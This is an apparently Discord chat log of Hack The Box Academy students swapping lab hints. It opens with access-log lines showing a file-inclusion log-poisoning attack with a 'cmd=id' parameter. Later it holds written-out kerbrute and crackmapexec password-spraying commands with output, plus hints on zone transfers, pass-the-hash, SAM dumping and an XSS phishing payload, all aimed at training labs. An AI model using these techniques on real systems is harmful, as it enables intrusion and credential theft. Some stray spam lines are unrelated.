Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1710 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
178.62.8.249 - - [28/Feb/2023:02:04:23 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:25 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:33 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1785 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:05:26 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 1799 "-" "'
```||
I get this... not sure what is going on i have tried many times other ways to do it.
Password Attack : Lab Medium
I just cracked the password using id_rsa. Whats next ? any hint
try using crackmapexec winrm (and the most important thing, the --local-auth option)
with mut password
anyone did an update of crackmapexec and now start to receive errors?
args = gen_cli_args()
use the id_rsa password; move onto the next thing; the medium lab is a bit of bouncing between cracking and exploiting
aka what is the RSA usually for?
solved it. thanks
thanks got it, I also had one less ../
Can't seem to get the privesc to work on Windows Privilege Escalation Skills Assessment I found a CLSID but it's authing as the current user. Am I on the right path? NVM, I was using the wrong one the whole time haha.
tt
Hi Everyone, Need some assistance, where am i missing > on file inclusion - LAST Q - skill assessment. As i have tried multiple probabilities using PHP wrappers but no luck ... still getting a blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?)
has your problem been solved?
Hey, im stuck on Active Directory Assessment II. I'm stuck on this question: Use a common method to obtain weak credentials for another user.
can someone nudge me on "Escape" box..
got 2 credentials
1 works sql and 1 works on sql and windows both .. still no user flag and access...
Please who here knows how to dork
Hey can someone help me to grab the FTP server banner for FTP - Footprinting ?
is there something that you don't understand?
no, i ran ||nmap script to grab banner, nmap default script, command status in the ftp server, i got 220 InFreight FTP v1.1|| but this is not the flag i don't understand
The flag and the banner are two separate questions
sorry, i want to submit the banner for the first question, i already have the flag.txt
all I can say is that you have the banner
wtf
you only need to make the differentiation what the banner consists of
but it only asks to submit the entire banner, so i don't understand
yes, that is correct and you have it, but you also have something that is not part of the banner
ok thanks
try asking yourself if I have the banner, then what could be stopping me to submit it, do I have something extra how can I narrow it down and understand what that extra is and what it indicates
anyone available for help on the last hop of the pivoting skill assessment ?
anyone can help me with this one(What is the FQDN of the host where the last octet ends with "x.x.x.203"?) and yes i have bruteforced all the domains i found but every time i get this message: NS record query failed: REFUSED
ur right ! thanks a lot
hey i'm learning Navigation section in Linux Fundamental modules, but is this suppose to be the right answer?
Hello everyone, im stuck on Active Directory Assessment II. I'm stuck on this question: Use a common method to obtain weak credentials for another user.
hint ||password spraying ||
you are using the right command but you need to run it on the given target machine not the pwnbox
sure what's the issue?
not sure about brute forcing but i can complete this section by doing a ||dns zone transfer|| twice and that also review the ip for me
wdym by twice?
Hi
i just mean run it twice but the second time with a ||subdomain|| of course
can't find DC ip adress
oh you don't need to
i did with all the subdomains i found, it says "transfer failed"
only internal and the normal one can complete the transfer
I can be a teacher i'm professional at this
the flag is on the third machine, there is a mounted share drive from the DC just go in file explorer and you will see it
yep you can do the zone transfer with only 1 subdomain
How can I be a teacher?
I used password spraying. I used kerbrute to find new users with jsmith.txt and crackmapexec
teacher on what subject
Hacking, Informatics...
dig axfr inlanefreight.htb @10.129.254.152
like this right
ok
yep but with a subdomain that (i think) is in the same zone
stdin - It stands for standard input, and is used for taking text as input. stdout - It stands for standard output, and is used for the text output of any command you type in the terminal; that output is stored in the stdout stream. stderr - It stands for standard error
i forgot how the username thing work but i just give the tool a "weak" password
i also tried this one, it gave me some sub domains aswell but still not the good one (dig axfr internal.inlanefreight.htb @10.129.254.152)
okay, but where
yeah that's spoiler also that should be all of the subdomain you'll need for this section
Linux
stream standards
When you enter a command, if no file name is given, your keyboard is the standard input, sometimes denoted as stdin . When a command finishes, the results are displayed on your screen. Your screen is the standard output, sometimes denoted as stdout .
enter a command where
The I/O streams can be redirected by putting the n> operator in use, where n is the file descriptor number. For redirecting stdout, we use "1>" and for stderr, "2>" is added as an operator.
ye but none is .203
In the console ofc
I'm not sure what console is
https://www.tutorialspoint.com/understanding-stdin-stderr-and-stdout-in-linux#:~:text=stdin โ It stands for standard,It stands for standard error. Look here, it explains it very well
what are the numbers in the url is that math?
oh wait sorry which module and section are you in?
No, In a URL, a hash mark, number sign, or pound sign ( # ) points a browser to a specific spot in a page or website. It is used to separate the URI of an object from a fragment identifier.
Footprinting, DNS and the last question
I understand for the weak password and use kerbrute (on Linux) but I found nothing interesting (I think I didnโt find good user
is it only that
oh i forgot, thanks for the help bro!
A URL can contain a number to identify to the website itself what data that URL should get from the database powering the site. The number corresponds to the ID of the category or post (or ecommerce item or... etc etc).
but the url you gave is not an ecommerce item
Yea that was an example
yep wrong module but for that dns zone transfer can also get you the subdomain just a bit more step and also a hint for that is you have to run the brute forcing tool on a subdomain not the main domain
alright
Thank you
no idea about that i do it on one of the windows machine
but why do we have those numbers and special characters
@vital adder when i do that i get: internal.inlanefreight.htb NS record query failed: REFUSED
HTML special characters are a series of codes that are used to translate the different characters used in human alphabets to display them in web browsers. This is because computers only use numbers and not letters or symbols.
yeah that is one of the 2 subdomain that will work but hint not that one
ok, feel free to help out and don't ask for money
alr
Okay thank you and I wont ask for money dw
I do it because I like my work
I love teaching others cybersecurity, my speciality
can you teach me how to hack??
Sure
what do u want to hack?
You want to learn from the beginning?
nvm i learned, you are a great teacher
Okay and thank you
@autumn pilot do I get a role? or what
nope
Okay
hello guys. Can someone help me out with active directory enum & attacks on section Password spraying - making a target user list
what exactly
Are you following the arguments in the example from the section?
yeah
and what is the error
DM ?
paste it here for future reference if someone else stumbles across the same issue
are you sure that this is the IP of the domain controller
I thought maybe the mistake was to use the wrong IP. Then did fping and found another IP. Tested it with the other one but same results
try to find a way to identify the domain controller
and a bonus question, how many NICs does the jumpbox have and why
Hey guys,
I'm in the Active Directory Enumeration & Attacks module, Internal Password Spraying - from Linux section.
||I made a valid users list with `kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " > validusers.txt` and it looks good when i cat it. Problem is that neither the bash one-liner, Kerbrute or CrackMapExec works. I got the answer for the section, but I just want to know what I'm doing wrong since I can't get any of the tools to work.
```
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $ for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt Welcome1

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:09:28 > Using KDC(s):
2023/02/28 07:09:28 > 172.16.5.5:88
2023/02/28 07:09:28 > [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:09:29 > Done! Tested 20 logins (0 successes) in 0.589 seconds
┌─[htb-student@ea-attack01]─[~]
└──╼ $ sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1 | grep +
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $
```||
remove the grep that you are piping and check if the domain\username is appropriately appended
shot in the dark, but let's see
||```
┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $ sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1
<SNIP>
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [-] INLANEFREIGHT.LOCAL\sgage@inlanefreight.local:Welcome1 STATUS_LOGON_FAILURE
<SNIP>
┌─[htb-student@ea-attack01]─[~]
└──╼ $ for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5; done
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
<SNIP>
```||
Wait... It cannot connect?!?
seems like it
maybe refresh the host again
Ping is fine
```
└──╼ $ ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=0.454 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.441 ms
64 bytes from 172.16.5.5: icmp_seq=3 ttl=128 time=0.534 ms
```
Broken/unstable lab?
As long as i know I'm not the problem I'll be satisfied...
ping might be fine, but smb might not
```
└──╼ $ smbclient -L 172.16.5.5
Enter WORKGROUP\htb-student's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
```
seems to be working, so the problem might be somewhere in the userlist
looks good yup
can you try with kerbrute's password spray
```
┌─[htb-student@ea-attack01]─[~]
└──╼ $ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt Welcome1

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:39:27 > Using KDC(s):
2023/02/28 07:39:27 > 172.16.5.5:88
2023/02/28 07:39:27 > [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:39:27 > Done! Tested 21 logins (0 successes) in 0.065 seconds
```
It doesn't even seem to try all 57 usernames
which command did you use before to create a list from the kerbrute ?
||kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " > validusers.txt||
give it a go with manually specifying a random username (entry from the userlist) and the password
maybe with a flag --user-as-pass ?
when i run kerbrute passwordspray command. I get errors ?
Exactly!
What is the problem?
My hit was an error too
hmmmm
Broken lab?
i will text support
Hum maybe i have the same problem with assessment skill 2 with kerbrute
Okay i texted the support now and bombed him with screenshots
It works if you only have one username in your .txt file
He'll check it he said
I should wait
So in the module u have to use the Parrot box to locally connect to inline, but whenever i try to upload a war file to the tomcat, it executes but i dont get a shell connection and i have used msfvenom and the msfconsole itself. Then i tried it on the blue machine and the msfconsole said it was vuln but no session created ( i opened the shell in the webpage)
In the module shells
What section?
The last one with the parrot box
@uncut mirage @fathom mortar works for me
you can skip the whole enumeration from rpc and the oneliner and just use the jsmiths.txt file to grep for accounts starting with s , generating such a wordlist can be used with kerbrute
and of course with crackmapexec
but cme doesnt work for me neither
have you grepped the jsmith.txt list for usernames starting with S?
i'll try that way. I thought you mean normal txt with cme
Works for me too. Has to be without @inlanefreight.local
But still. Why does kerbrute only work with one entry in the file?
could it be due to formatting in the file
^how do you remove all @inlanefreight.com at once ?
so the tail command ?
nope just showcasing 5 entries of the users.txt to fit into the screenshot
oh
same goes for head
```
└──╼ $ cat validusers.txt
dpayne@inlanefreight.local
mhicks@inlanefreight.local
adunn@inlanefreight.local
lmatthews@inlanefreight.local
avazquez@inlanefreight.local
mlowe@inlanefreight.local
<SNIP>
sgage@inlanefreight.local
jshay@inlanefreight.local
jhermann@inlanefreight.local
whouse@inlanefreight.local
emercer@inlanefreight.local
wshepherd@inlanefreight.local
┌─[htb-student@ea-attack01]─[~]
└──╼ $ cat validusers2.txt
sgage@inlanefreight.local
```
`validusers.txt` does not work, `validuser2.txt` does work. No difference in formatting as far as i can see?
what does the cut -d '@' -f1 stand for
if you less one file at the time can you see something different?
No difference apart from the fact that validusers.txt contains 36 lines and validusers2.txt only contains one.
interesting
i did it now with the list only with users and tried it with kerbrute. Still not working
@uncut mirage does it work for you ?
Yeah kerbrute is still not working for either of us
remove the ||@inlanefreight.local||
i did
CME needs to be without @inlanefreight.local
Kerbrute needs to be with
Great, looks like you got it working
Yes, Kerbrute is still a bitch...
interesting behaviour of the tool
yeah
it automatically appends the "domain" (kerbrute), however, if you have a list that contains that domain it will throw an error
maybe it has to something with the way of how it treats the entries
so yeah, you definitely don't need the @inlanefreight.local part
it worked with kerbrute for the supportguy too
this is due to automatically appending the @domain at the username when a valid login is found, this is not the actual entry from the wordlist
And for find user weak credentials for an other user for Active Directory assessment skill II?
which feeds the illusion that the user wordlist is in the form of username@<DOMAIN.COM>
this is a bad question, but how can i get to the cybernetics prolab channel?
edit just verify again ig ๐
I removed the domain and it still doesn't work for me with kerbrute...
```
└──╼ $ cat validusers2.txt
jjones
sbrown
<SNIP>
evalentin
sgage
jshay
jhermann
whouse
emercer
wshepherd
┌─[htb-student@ea-attack01]─[~]
└──╼ $ kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers2.txt Welcome1

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< / __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 08:43:03 > Using KDC(s):
2023/02/28 08:43:03 > 172.16.5.5:88
2023/02/28 08:43:03 > [!] bdavis@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 > [!] mmorgan@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 > Done! Tested 21 logins (0 successes) in 0.085 seconds
```
The bash one-liner and CME works though!
Yes, because kerbrute will append -d inlanefreight.local to the users, e.g. if the userlist contains only checkmate entry, then kerbrute will try checkmate@inlanefreight.local
at least for now this is my logic
hello everyone can someone help me with windows privesc skills assessment please ?
also let's remove any spoilers
If it appends then why would a list of usernames without the domain not work?
it works for me for some reason
But a single entry without the domain would?
Would you mind trying this list with kerbrute:
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " | cut -d '@' -f1 > validusers.txt
Exactly WTF is wrong? On a real engagement that is how you would do it...
it is not even consistent, it will check for example 15 logins and on the next run 20
yeah
Yes, it makes no sense
one approach would be to remove users that trigger the kdc_error from the list and run it again
maybe thats stopping the tool from going further but that doesn't make sense
Ok yeah, if you remove the ones that trigger kdc_error it works... So, why is that error triggered?
it goes on. in the next section i try to connect via rdp. The only thing i get is a black screen
Can we get support to try with kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " | cut -d '@' -f1 > validusers.txt? ๐
he already close my ticket
thats a good question that I'm trying to get the answer
my guess would it be due to the nature of how those accounts were created is triggering that error message, if you remove all of those user entries that trigger it kerbrute will proceed with the passwordspray
@uncut mirage can you connect to the host via rdp in the next section ?
Ok thanks. Guess that's just how it is, now i know what to do about it
Doesn't seem like it... Just black screen...
Yeh for me too
click enter or click anywhere on the screen
anyone that knows how to travel in the imap command line
because it's turning me crazy and i dont know how to get the flag
can anyone help me out solve the second one on https://academy.hackthebox.com/module/115/section/1132
have you connected to the target?
Hi Everyone, Need some assistance, where am i missing > on file inclusion - LAST Q - skill assessment. As i have tried multiple probabilities using PHP wrappers but no luck ... still getting a blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?)
Fuzzing Module
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb/
Nothing gets displayed i don't know what am doing wrong..
yes yes, i fixed the url, still nothing
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://FUZZ.hackthebox.eu/
Is your SecList in that directory?
yep, the scan runs ... but no output is there
ffuf -w wordlist -u domain -H "FUZZ.domain"
the only time yours will work on internal domains is if you have a dnsmasq setup
Thanks I knew there was something off
FUZZ: /opt/useful & not FUZZ: SPACE/opt/useful <<<hope it helps further (a little typo can waste much time) CHEERS
I just couldn't pin it
Hi
thank you guys!
Does someone need help?
Me
Okay what do you need
dms
Show me what you are doing
I tried to download it using "sudo apt install scrcpy" but nothing except an err says Unable to locate package
?
english only
sorry bro
in Password Mutations from PASSWORD ATTACKS what rule did you use guys, I tried with the default custom rule downloaded from the resources section and found nothing, i have another question in Network Services: which wordlist did you use to brute force rdp, tried with the resources wordlist and didnt find anything
once you have created a mutated wordlist using the rule and the provided wordlist have you tried to brute force the login of the mentioned user
utilizing this command or i need another parameter 'hydra -I -l sam -P mut_password.list -v ssh://10.129.160.184'
looks like you have a syntax issue
where is the issue?
dont worry I use glasses 
to sum it up, the command looks good
thanks, hydra its giving me [VERBOSE] Disabled child 10 because of too many errors so gonna try with ncrack
im struggling at the last question of the first PtH (PasswordAttacks)
ah great
Something that came to my mind that you can try is to use ligolo or another tool that will create a tunnel that you can use with evil-winrm and the -H option to log in using the hash.
Might not work, but worth the try.
I swear man, the Password Attacks module is breaking me.
It's not hard, it just costs a lot of patience.
Hello, I am having difficulty with one of the modules and was wondering if I could get help here.
just post your question and someone's likely to help
Your output has a flag visible... maybe spoiler it.
And I'm not sure what question you're trying to answer from what module.
After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
the flag wasn't an answer to anything as far as i know
this is from the nmap module?
yep
If this is the medium skills assessment, the way I arrived at the answer is not how it was intended to be found.
I tried looking at the scripts that nmap has.
None of them gave me an answer though.
-sV just doesn't return anything for port 53.
I think for this one you have to understand how DNS works.
Do you know how DNS questions and answers are sent?
The flag is literally in the output that you gave.
It's asking for the version.
Not a flag.
I thought he said that it didn't work.
I will say no because I am not sure about your question.
NETWORK ENUMERATION WITH NMAP
Firewall and IDS/IPS Evasion - Medium Lab
actually
I was copy-pasting the flag and it had an extra space.
lol
All good now.
Thank you for the help xD
The way it's worded is weird though.
Well, since it was asking for a version I was looking for an x.xx.xx kind of format.
yea...
Thank you for the help though.
An error is coming up saying that free users are only allowed 1 Pwnbox.
yup
What do you mean by yup? Tell me how to fix it.
don't be a free user
hehe
how much they need
check the billing page
Ok, but I live in India and I have rupees, how will I pay in $?
I have no idea, sorry
I think it automagically converts it to $?
A service I use takes payment in yen, but since I live in the US it converts my $ to yen.
Hi,
Anyone have a hint for Credential Hunting in Linux in passwords attacks module ?
I'm connected via SSH.
I used all the techniques in the course but we can't download anything.
There is no Python.
In the history we find a trace of firefox_decrypt but I can't download it on the host.
firefox_decrypt is already on the machine.
I believe, if my memory serves me correctly.
Thanks for your reply !
I don't see it on the machine, and in the bash history we can see that it was deleted.
In addition, on the machine there is no Python and I cannot download anything on this machine, it has no access to the internet.
Even opening a web server on my local machine does not allow me to download files.
module: Password Attacks
section: Protected Archives
I'm having trouble with the challenge on this one. I had no trouble cracking SSH keys, but I can't seem to get any of the three wordlists (password.list, mutated.list, rockyou.txt) to work for cracking these .zip archives.
Can I master cybersec only with Hack The Box?
Hint: kira
Master is a strong word, you can get good at it
But mastering is a different thing
Mmm yes
I just don't have money to spend on a uni degree.
So I'm just thinking about self study, just want to make sure.
There must be Python, maybe in another version (1.x, 2.x, 3.x).
Or specify the version in the terminal.
Hi there, sorry if it's the wrong channel because there is no general. Does anyone here know about cracking?
When I run the command `which python` it returns nothing.
And even if there was Python, firefox_decrypt is no longer on the machine, and even with a local server from my machine I cannot upload the script to the target.
I don't know what I can do.
Oh yes, I found Python.
I need to find out how to upload firefox_decrypt.
So I'm stupid, now it's ok with a local server...
I restarted the target, perhaps there was a problem.
Hi
I feel a little silly asking this, but how do you go about resetting BloodHound? Like between engagements?
Pretty sure you gotta clear the neo4j DB. Best way to do so, idk.
maybe this button can help you
Just came here to celebrate... My first hack! Love the course answer!
This pen testing course is really interesting! It keeps me going for more!
module: Footprinting, section: Footprinting Lab - Easy. I want to confirm something. When you FTP to the site, does it look like this to you? I am trying to figure out if it is my firewall blocking the return data or something else. I did try to start an instance of the online workstation, but it just hangs waiting for the instance to start. My roommate was messing around with the firewall during the weekend; I am not sure if he installed a new one or just played around with the settings trying to harden it.
Well, I don't remember, but from my notes it looks like I played around with wget.
Thanks, I'll try playing around with wget, but I still think I am having issues with the firewall blocking me.
I'm on the medium box of the Footprinting module. I mounted the NFS share and created a custom group mimicking the group ID of the mounted file; I named it "hopefully". I assigned the group to a user I created, but when I try to go inside the folder it won't let me. So I use sudo, but the password I set for the user doesn't work. Here's some information:
```
$ ls -l
total 64
drwx------ 2 nobody hopefully 65536 Nov 11  2021 TechSupport
$ sudo cd TechSupport/
[sudo] password for testest:
testest is not in the sudoers file.  This incident will be reported.
```
Hey people, just having an issue on one of the Academy modules. I'm on the Intro to CMD module, on "Finding Files and Directories".
I've RDP'd to the Windows machine, now I'm in CMD trying to find that file, been using commands such as:
"find /R c:\Users\htb-student\ waldo.txt"
"where /R c:\Users\htb-student\ waldo.txt"
Having no luck, can someone point me in the right direction?
Search the whole system and not only the user directory.
Have you elevated your prompt?
oh god
all that time
I just spent around an hour trying to work this out myself and the simple answer is that I wasn't running CMD in admin mode.
So I was using the right commands, but just wasn't using my brain.
Thank you my friend
in theory and in practice those should work
For AD Enumeration: ACL Abuse Tactics. I keep attempting to run through the given examples, but getting
"damundsen user not found" when running Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
I've attempted to refer to the domain using a -Domain flag, but nothing is working, so I am stuck on this module and the next, since the next one depends on leveraging adunn's privileges, which need damundsen's privileges.
I need a bit of help with Password Attacks Lab - Hard
I managed to get both ||SAM & SYSTEM|| from the ||VHD|| after mounting it. I dumped the creds but I can't seem to use them anywhere. I tried cme, winrm, and rdp.
Attacking SAM module.
I did. I was able to ||samdump2 SYSTEM SAM||
Yeah, I tried cme, winrm and rdp to pass-the-hash. I'll try again, maybe a cut and paste issue.
Probably, since you're pretty close to the flag.
Yeah, I tried with 3 users ||(johanna, david, administrator)|| and the same hash from ||samdump2||. I get --> Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
It should work with ||administrator||.
I remember that for the SAM issue I used ||secretsdump.py||. Maybe you have a problem with ||samdump2||? Or maybe you are copying the hash wrong, just to give some ideas.
Let me try secretsdump.
Thanks. I guess there is something wrong with my samdump2.
no problem ^^
I'm using samdump2 3.0.0
Impacket v0.10.1
The Impacket is older than the samdump2 (it's the latest).
Found the answer, so someone here doesn't fall into the same trap as me:
samdump2 is used to extract hashes from Windows 2k/NT/XP/Vista SAM
The machine I was using it on is a Windows Server 2019.
read the section info again about dumping column names
I have tried but I didn't get it.
Which module and section is this one again?
Done, I got it just now, thanks.
There any chance a mod can dm me regarding authentication issues?
I got a question. I have 30 cubes and tried to unlock a module worth ten, but it won't let me. Does anyone know what's going on?
nvm i got it
Hello guys
Good morning
How can I subscribe to HTB student package?
I need a valid academic domain so I can subscribe, please.
If you have an academic email that isn't accepted contact support with the green bubble on the bottom right and they can review it
What if they still don't verify it?
They usually do, I did not have a student email but still after contacting support, I provided the school website and they allowed me student discount.
module = password attacks - section passwd, Shadow & opasswd.
I have the shadow.bak and passwd.bak files, then unshadow, then trying to run hashcat against it. I think I need to mutate it but have no idea?
any hints?
You have to provide a csrf token as the value of the 'csrf-token'
not just the name
you can intercept the request with burp and see a csrf token i think
mods usually dont handle that, contact support
Module Name: Windows PE
Section Name: Interacting with Users
The question: "Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user." I do like the section, but I just got htb-student. Can someone help me out?
Actually, this password I could get on my own, isn't it? Or what couldn't I understand?
You are sending a phishing payload
To obtain creds
That's all I can say as I haven't done it
I don't know what it means.
It tells you exactly what it wants you to do
Using the base html form and an XSS payload, send it on "send.php" you should see a return of the credentials
This is one of the most verbose questions.
ok
Because this isn't the Gen chat
loser
lifesteal < duping server
- Find a suitable trash can: Choose a sturdy, large trash can with a lid that can be tightly sealed to prevent any odor from escaping.
You having fun kid?
- Line the bathtub: Line the bathtub with a plastic sheet or liner to make cleaning up easier. You can also place towels or absorbent materials on the bottom of the bathtub to help absorb the waste.
yikes
loser
am I late
not at all, an actual bot here
another mrbeast copy (1080060416169869312) has been banned until 2035-12-05 06:22:41 (UTC).
Hehe
dang p fast
tempban
2035 
2035 tempban
12 years later bot just resumes
In 12 years, I'll be old
You're already old
Absolutely rude, you don't have to remind me 
module = password attacks - section passwd, Shadow & opasswd.
I have the shadow.bak and passwd.bak files, then unshadow, then trying to run hashcat against it. Not working. I know I have to change the password.list file but it gives me nothing to go off?
any hints?
Is there any reason why webshells disappear? I'll be typing commands ("1.1.1.1/shell.php?cmd=id" for example), and it'll be fine until I randomly get "the requested URL was not found on this server" even though it's the same shell I've been using the entire time. When I try to find the shell again it seems to have vanished & I have to make a new one.
Just checking to see if theres problems with the Targets in the modules. Have closed browser as well as disconnect/reconnect VPN and I cannot create a target in WEB ATTACKS - Local File Disclosure. I can create / reset targets in other areas just not here....
sorted itself out
The mutated password list is a start
If anyone on information gathering module done or still going on it let's do it together I think that would be interesting
@fathom pendant thanks, got it. The question/section really didn't mention anything... but got the answer, so meh.
Does anyone have a solution for this Nessus issue?
Issue -->
```
[-] Error while running command nessus_scan_new: undefined method `[]' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/plugins/nessus.rb:994:in `cmd_nessus_scan_new'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:168:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
```
The module itself reuses the password, mutated password, and user list a lot
@fathom pendant kk
Wrong channel mate. #1024429874246590575. If you have further issues contact CS.
ok
Anyone done the File upload attacks/ Limited File uploads section?
I'm on the first question. I'm uploading a file but I don't see any source info. I feel I'm missing a step.
Hey, I'm learning the Navigation section in the Linux Fundamentals module, but is this supposed to be the right answer?
Anyone with password cracking module
Is it possible to reset the progress on the modules?
I'm at the PtT with Linux section. Need help with anything before that?
Try to upload an accepted file, intercept the HTTP request, then try to change the extension and the file content.
If you want to retake the module I think it's possible, go to your dashboard, completed modules, click on the one you want to retake, and then "retake module"
The support team was offline when I requested it. I was open to the bot responses. It directed me to change my HTB email to the valid academic domain, then boom, I got stuck! I am asked to verify the email but I don't have access to the school's email address I supplied.
What can I now do?
Anyone to help?
You have to contact the support team again. You can probably ping the admin here in Discord and talk about it.
The admins in Discord have nothing to do with the websites.
Do the admins here in Discord have a connect to HTB support?
why would they?
Hack The Box support can only be reached through the websites.
On top of that, why would one try to change their current email to one that they don't have access to?
Where is the logic?
I only followed the directives of the bot. My bad.